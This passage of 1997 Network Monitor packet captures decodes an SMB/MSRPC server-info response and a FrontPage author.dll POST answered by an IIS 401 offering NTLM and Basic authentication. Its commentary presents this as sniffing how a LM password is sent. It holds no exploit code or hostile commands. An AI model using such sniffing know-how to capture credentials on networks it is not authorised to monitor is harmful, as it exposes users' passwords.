  601.         MSRPC: ......1. = Last fragment -or- Cancel pending
  602.         MSRPC: .....0.. = Not a fragment -or- No cancel pending (AES/DC)
  603.         MSRPC: ....0... = Receiver to repond with a fack PDU -or- Reserved (AES/DC)
  604.         MSRPC: ...0.... = Not used -or- Does not support concurrent multiplexing (AES/DC)
  605.         MSRPC: ..0..... = Not for an idempotent request -or- Did not execute guaranteed call (Fault PDU only) (AES/DC)
  606.         MSRPC: .0...... = Not for a broadcast request -or- 'Maybe' call semantics not requested (AES/DC)
  607.         MSRPC: 0....... = Reserved -or- No object UUID specified in the optional object field (AES/DC)
  608.     MSRPC: Packed Data Representation    MSRPC: Fragment Length = 116 (0x74)
  609.     MSRPC: Authentication Length = 0 (0x0)    MSRPC: Call Identifier = 1 (0x1)
  610.     MSRPC: Bind Frame Number = 25 (0x19)
  611.     MSRPC: Abstract Interface UUID = 4B324FC8-1670-01D3-1278-5A47BF6EE188
  612.     MSRPC: Allocation Hint = 92 (0x5C)
  613.     MSRPC: Presentation Context Identifier = 0 (0x0)
  614.     MSRPC: Cancel Count = 0 (0x0)    MSRPC: Reserved = 0 (0x0)
  615.     MSRPC: Stub DataR_SRVSVC: RPC Server response srvsvc:NetrServerGetInfo(..)
  616.     R_SRVSVC: LPSERVER_INFO InfoStruct {..}
  617.         R_SRVSVC: Switch Value = 101 (0x65)
  618.         R_SRVSVC: LPSERVER_INFO_101 ServerInfo101 {..}
  619.             R_SRVSVC: DWORD sv101_platform_id = 500 (0x1F4)
  620.             R_SRVSVC: LPTSTR sv101_name = 1363784 (0x14CF48)
  621.             R_SRVSVC: DWORD sv101_version_major = 4 (0x4)
  622.             R_SRVSVC: DWORD sv101_version_minor = 0 (0x0)
  623.             R_SRVSVC: DWORD sv101_type = 266251 (0x4100B)
  624.             R_SRVSVC: LPTSTR sv101_comment = 1363812 (0x14CF64)
  625.             R_SRVSVC: LPTSTR sv101_name = 204.73.131.11
  626.             R_SRVSVC: LPTSTR sv101_comment = 
  627.     R_SRVSVC: Return Value = 0 (0x0)
  628. 00000:  00 C0 4F C4 8C 93 00 C0 4F C4 8C 9D 08 00 45 00   ..O.....O.....E.
  629. 00010:  00 D8 3C 0E 40 00 80 06 1F 60 CC 49 83 0B CC 49   ..<.@....`.I...I
  630. 00020:  83 13 00 8B 07 28 00 16 FB 1A 04 60 25 6F 50 18   .....(.....`%oP.
  631. 00030:  1C 92 7C 1E 00 00 00 00 00 AC FF 53 4D 42 25 00   ..|........SMB%.
  632. 00040:  00 00 00 98 03 80 24 82 00 00 00 00 00 00 00 00   ......$.........
  633. 00050:  00 00 00 08 C0 7C 00 08 C0 01 0A 00 00 74 00 00   .....|.......t..
  634. 00060:  00 00 00 38 00 00 00 74 00 38 00 00 00 00 00 75   ...8...t.8.....u
  635. 00070:  00 48 05 00 02 03 10 00 00 00 74 00 00 00 01 00   .H........t.....
  636. 00080:  00 00 5C 00 00 00 00 00 00 00 65 00 00 00 30 CF   ..\.......e...0.
  637. 00090:  14 00 F4 01 00 00 48 CF 14 00 04 00 00 00 00 00   ......H.........
  638. 000A0:  00 00 0B 10 04 00 64 CF 14 00 0E 00 00 00 00 00   ......d.........
  639. 000B0:  00 00 0E 00 00 00 32 00 30 00 34 00 2E 00 37 00   ......2.0.4...7.
  640. 000C0:  33 00 2E 00 31 00 33 00 31 00 2E 00 31 00 31 00   3...1.3.1...1.1.
  641. 000D0:  00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00   ................
  642. 000E0:  16 00 00 00 00 00                                 ......          
  643. Frontpage Sniff:
  644. Below you notice the NTLM authentication process and that an application called
  645. X-vermeer-urlencoded is the utility that is encrypting our LM password. An option
  646. within IIS "Windows NT Challeng/Response" is turned on in the following example. 
  647. 21 30.856 00C04FC48C8F STUDENT7 HTTP POST Request (from client using port 1140) 204.73.131.18 STUDENT7 IP 
  648. FRAME: Base frame properties
  649.     FRAME: Time of capture = Dec 1, 1997 17:56:55.389
  650.     FRAME: Time delta from previous physical frame: 2 milliseconds
  651.     FRAME: Frame number: 21    FRAME: Total frame length: 433 bytes
  652.     FRAME: Capture frame length: 433 bytes
  653.     FRAME: Frame data: Number of data bytes remaining = 433 (0x01B1)
  654. ETHERNET: ETYPE = 0x0800 : Protocol = IP:  DOD Internet Protocol
  655.     ETHERNET: Destination address : 00C04FC48C93
  656.         ETHERNET: .......0 = Individual address
  657.         ETHERNET: ......0. = Universally administered address
  658.     ETHERNET: Source address : 00C04FC48C8F
  659.         ETHERNET: .......0 = No routing information present
  660.         ETHERNET: ......0. = Universally administered address
  661.     ETHERNET: Frame Length : 433 (0x01B1)
  662.     ETHERNET: Ethernet Type : 0x0800 (IP:  DOD Internet Protocol)
  663.     ETHERNET: Ethernet Data: Number of data bytes remaining = 419 (0x01A3)
  664. IP: ID = 0xB805; Proto = TCP; Len: 419    IP: Version = 4 (0x4)
  665.     IP: Header Length = 20 (0x14)    IP: Service Type = 0 (0x0)
  666.         IP: Precedence = Routine        IP: ...0.... = Normal Delay
  667.         IP: ....0... = Normal Throughput
  668.         IP: .....0.. = Normal Reliability    IP: Total Length = 419 (0x1A3)
  669.     IP: Identification = 47109 (0xB805)    IP: Flags Summary = 2 (0x2)
  670.         IP: .......0 = Last fragment in datagram
  671.         IP: ......1. = Cannot fragment datagram
  672.     IP: Fragment Offset = 0 (0x0) bytes    IP: Time to Live = 128 (0x80)
  673.     IP: Protocol = TCP - Transmission Control    IP: Checksum = 0xA296
  674.     IP: Source Address = 204.73.131.18
  675.     IP: Destination Address = 204.73.131.19
  676.     IP: Data: Number of data bytes remaining = 399 (0x018F)
  677. TCP: .AP..., len:  379, seq:    705525-705903, ack:   4115388, win: 8760, src: 1140  dst:   80 
  678.     TCP: Source Port = 0x0474
  679.     TCP: Destination Port = Hypertext Transfer Protocol
  680.     TCP: Sequence Number = 705525 (0xAC3F5)
  681.     TCP: Acknowledgement Number = 4115388 (0x3ECBBC)
  682.     TCP: Data Offset = 20 (0x14)    TCP: Reserved = 0 (0x0000)
  683.     TCP: Flags = 0x18 : .AP...        TCP: ..0..... = No urgent data
  684.         TCP: ...1.... = Acknowledgement field significant
  685.         TCP: ....1... = Push function        TCP: .....0.. = No Reset
  686.         TCP: ......0. = No Synchronize        TCP: .......0 = No Fin
  687.     TCP: Window = 8760 (0x2238)    TCP: Checksum = 0xA8FF
  688.     TCP: Urgent Pointer = 0 (0x0)
  689.     TCP: Data: Number of data bytes remaining = 379 (0x017B)
  690. HTTP: POST Request (from client using port 1140)    HTTP: Request Method = POST
  691.     HTTP: Uniform Resource Identifier = /_vti_bin/_vti_aut/author.dll
  692.     HTTP: Protocol Version = HTTP/1.0
  693.     HTTP: Date = Mon, 01 Dec 1997 23:57:10 GMT    HTTP: MIME-Version = 1.0
  694.     HTTP: User-Agent = MSFrontPage/3.0    HTTP: Host = 204.73.131.19
  695.     HTTP: Accept = auth/sicily    HTTP: Content-Length = 62
  696.     HTTP: Content-Encoding = x-vermeer-1
  697.     HTTP: Content-Type = application/x-vermeer-rpc
  698.     HTTP: Undocumented Header = X-Vermeer-Content-Type: application/x-vermeer-rpc
  699.         HTTP: Undocumented Header Fieldname = X-Vermeer-Content-Type
  700.         HTTP: Undocumented Header Value = application/x-vermeer-rpc
  701.     HTTP: Data: Number of data bytes remaining = 62 (0x003E)
  702. 00000:  00 C0 4F C4 8C 93 00 C0 4F C4 8C 8F 08 00 45 00   ..O.....O.....E.
  703. 00010:  01 A3 B8 05 40 00 80 06 A2 96 CC 49 83 12 CC 49   ....@......I...I
  704. 00020:  83 13 04 74 00 50 00 0A C3 F5 00 3E CB BC 50 18   ...t.P.....>..P.
  705. 00030:  22 38 A8 FF 00 00 50 4F 53 54 20 2F 5F 76 74 69   "8....POST /_vti
  706. 00040:  5F 62 69 6E 2F 5F 76 74 69 5F 61 75 74 2F 61 75   _bin/_vti_aut/au
  707. 00050:  74 68 6F 72 2E 64 6C 6C 20 48 54 54 50 2F 31 2E   thor.dll HTTP/1.
  708. 00060:  30 0D 0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 30 31   0..Date: Mon, 01
  709. 00070:  20 44 65 63 20 31 39 39 37 20 32 33 3A 35 37 3A    Dec 1997 23:57:
  710. 00080:  31 30 20 47 4D 54 0D 0A 4D 49 4D 45 2D 56 65 72   10 GMT..MIME-Ver
  711. 00090:  73 69 6F 6E 3A 20 31 2E 30 0D 0A 55 73 65 72 2D   sion: 1.0..User-
  712. 000A0:  41 67 65 6E 74 3A 20 4D 53 46 72 6F 6E 74 50 61   Agent: MSFrontPa
  713. 000B0:  67 65 2F 33 2E 30 0D 0A 48 6F 73 74 3A 20 32 30   ge/3.0..Host: 20
  714. 000C0:  34 2E 37 33 2E 31 33 31 2E 31 39 0D 0A 41 63 63   4.73.131.19..Acc
  715. 000D0:  65 70 74 3A 20 61 75 74 68 2F 73 69 63 69 6C 79   ept: auth/sicily
  716. 000E0:  0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68   ..Content-Length
  717. 000F0:  3A 20 36 32 0D 0A 43 6F 6E 74 65 6E 74 2D 45 6E   : 62..Content-En
  718. 00100:  63 6F 64 69 6E 67 3A 20 78 2D 76 65 72 6D 65 65   coding: x-vermee
  719. 00110:  72 2D 31 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70   r-1..Content-Typ
  720. 00120:  65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78   e: application/x
  721. 00130:  2D 76 65 72 6D 65 65 72 2D 72 70 63 0D 0A 58 2D   -vermeer-rpc..X-
  722. 00140:  56 65 72 6D 65 65 72 2D 43 6F 6E 74 65 6E 74 2D   Vermeer-Content-
  723. 00150:  54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F   Type: applicatio
  724. 00160:  6E 2F 78 2D 76 65 72 6D 65 65 72 2D 72 70 63 0D   n/x-vermeer-rpc.
  725. 00170:  0A 0D 0A B0 32 7D ED 9D 1C A9 A8 B3 BB BC 12 39   ....2}.........9
  726. 00180:  84 F7 B3 9C 83 A4 CF 39 B7 B4 BC 23 05 A7 41 79   .......9...#..Ay
  727. 00190:  05 F8 45 78 01 FA 41 50 01 F8 47 D4 07 55 7D E3   ..Ex..AP..G..U}.
  728. 001A0:  F8 C2 9F 0F B4 BC 23 B9 A9 F9 F7 FC A4 1B 79 28   ......#.......y(
  729. 001B0:  B1                                                .               
  730. If Windows NT Challenge/Response Security is enabled on the Web Server, each initial request to download a file, after establishing a TCP session,
  731. is responded to with an accesss denied HTTP frame:
  732. 23 30.859 STUDENT7 00C04FC48C8F HTTP Response (to client using port 1140) STUDENT7 204.73.131.18 IP 
  733. FRAME: Base frame properties
  734.     FRAME: Time of capture = Dec 1, 1997 17:56:55.392
  735.     FRAME: Time delta from previous physical frame: 0 milliseconds
  736.     FRAME: Frame number: 23    FRAME: Total frame length: 224 bytes
  737.     FRAME: Capture frame length: 224 bytes
  738.     FRAME: Frame data: Number of data bytes remaining = 224 (0x00E0)
  739. ETHERNET: ETYPE = 0x0800 : Protocol = IP:  DOD Internet Protocol
  740.     ETHERNET: Destination address : 00C04FC48C8F
  741.         ETHERNET: .......0 = Individual address
  742.         ETHERNET: ......0. = Universally administered address
  743.     ETHERNET: Source address : 00C04FC48C93
  744.         ETHERNET: .......0 = No routing information present
  745.         ETHERNET: ......0. = Universally administered address
  746.     ETHERNET: Frame Length : 224 (0x00E0)
  747.     ETHERNET: Ethernet Type : 0x0800 (IP:  DOD Internet Protocol)
  748.     ETHERNET: Ethernet Data: Number of data bytes remaining = 210 (0x00D2)
  749. IP: ID = 0xC126; Proto = TCP; Len: 210    IP: Version = 4 (0x4)
  750.     IP: Header Length = 20 (0x14)    IP: Service Type = 0 (0x0)
  751.         IP: Precedence = Routine        IP: ...0.... = Normal Delay
  752.         IP: ....0... = Normal Throughput
  753.         IP: .....0.. = Normal Reliability    IP: Total Length = 210 (0xD2)
  754.     IP: Identification = 49446 (0xC126)    IP: Flags Summary = 2 (0x2)
  755.         IP: .......0 = Last fragment in datagram
  756.         IP: ......1. = Cannot fragment datagram
  757.     IP: Fragment Offset = 0 (0x0) bytes    IP: Time to Live = 128 (0x80)
  758.     IP: Protocol = TCP - Transmission Control    IP: Checksum = 0x9A46
  759.     IP: Source Address = 204.73.131.19
  760.     IP: Destination Address = 204.73.131.18
  761.     IP: Data: Number of data bytes remaining = 190 (0x00BE)
  762. TCP: .AP..., len:  170, seq:   4115388-4115557, ack:    705904, win: 8381, src:   80  dst: 1140 
  763.     TCP: Source Port = Hypertext Transfer Protocol
  764.     TCP: Destination Port = 0x0474    TCP: Sequence Number = 4115388 (0x3ECBBC)
  765.     TCP: Acknowledgement Number = 705904 (0xAC570)
  766.     TCP: Data Offset = 20 (0x14)    TCP: Reserved = 0 (0x0000)
  767.     TCP: Flags = 0x18 : .AP...        TCP: ..0..... = No urgent data
  768.         TCP: ...1.... = Acknowledgement field significant
  769.         TCP: ....1... = Push function        TCP: .....0.. = No Reset
  770.         TCP: ......0. = No Synchronize        TCP: .......0 = No Fin
  771.     TCP: Window = 8381 (0x20BD)    TCP: Checksum = 0xD958
  772.     TCP: Urgent Pointer = 0 (0x0)
  773.     TCP: Data: Number of data bytes remaining = 170 (0x00AA)
  774. HTTP: Response (to client using port 1140)    HTTP: Protocol Version = HTTP/1.0
  775.     HTTP: Status Code = Unauthorized    HTTP: Reason = Access Denied
  776.     HTTP: WWW-Authenticate = NTLM
  777.     HTTP: WWW-Authenticate = Basic realm="204.73.131.19"
  778.     HTTP: Content-Length = 24    HTTP: Content-Type = text/html
  779.     HTTP: Data: Number of data bytes remaining = 24 (0x0018)
  780. 00000:  00 C0 4F C4 8C 8F 00 C0 4F C4 8C 93 08 00 45 00   ..O.....O.....E.
  781. 00010:  00 D2 C1 26 40 00 80 06 9A 46 CC 49 83 13 CC 49   ...&@....F.I...I
  782. 00020:  83 12 00 50 04 74 00 3E CB BC 00 0A C5 70 50 18   ...P.t.>.....pP.
  783. 00030:  20 BD D9 58 00 00 48 54 54 50 2F 31 2E 30 20 34    ..X..HTTP/1.0 4
  784. 00040:  30 31 20 41 63 63 65 73 73 20 44 65 6E 69 65 64   01 Access Denied
  785. 00050:  0D 0A 57 57 57 2D 41 75 74 68 65 6E 74 69 63 61   ..WWW-Authentica
  786. 00060:  74 65 3A 20 4E 54 4C 4D 0D 0A 57 57 57 2D 41 75   te: NTLM..WWW-Au
  787. 00070:  74 68 65 6E 74 69 63 61 74 65 3A 20 42 61 73 69   thenticate: Basi
  788. 00080:  63 20 72 65 61 6C 6D 3D 22 32 30 34 2E 37 33 2E   c realm="204.73.
  789. 00090:  31 33 31 2E 31 39 22 0D 0A 43 6F 6E 74 65 6E 74   131.19"..Content
  790. 000A0:  2D 4C 65 6E 67 74 68 3A 20 32 34 0D 0A 43 6F 6E   -Length: 24..Con
  791. 000B0:  74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F   tent-Type: text/
  792. 000C0:  68 74 6D 6C 0D 0A 0D 0A 45 72 72 6F 72 3A 20 41   html....Error: A
  793. 000D0:  63 63 65 73 73 20 69 73 20 44 65 6E 69 65 64 2E   ccess is Denied.
  794.  
  795.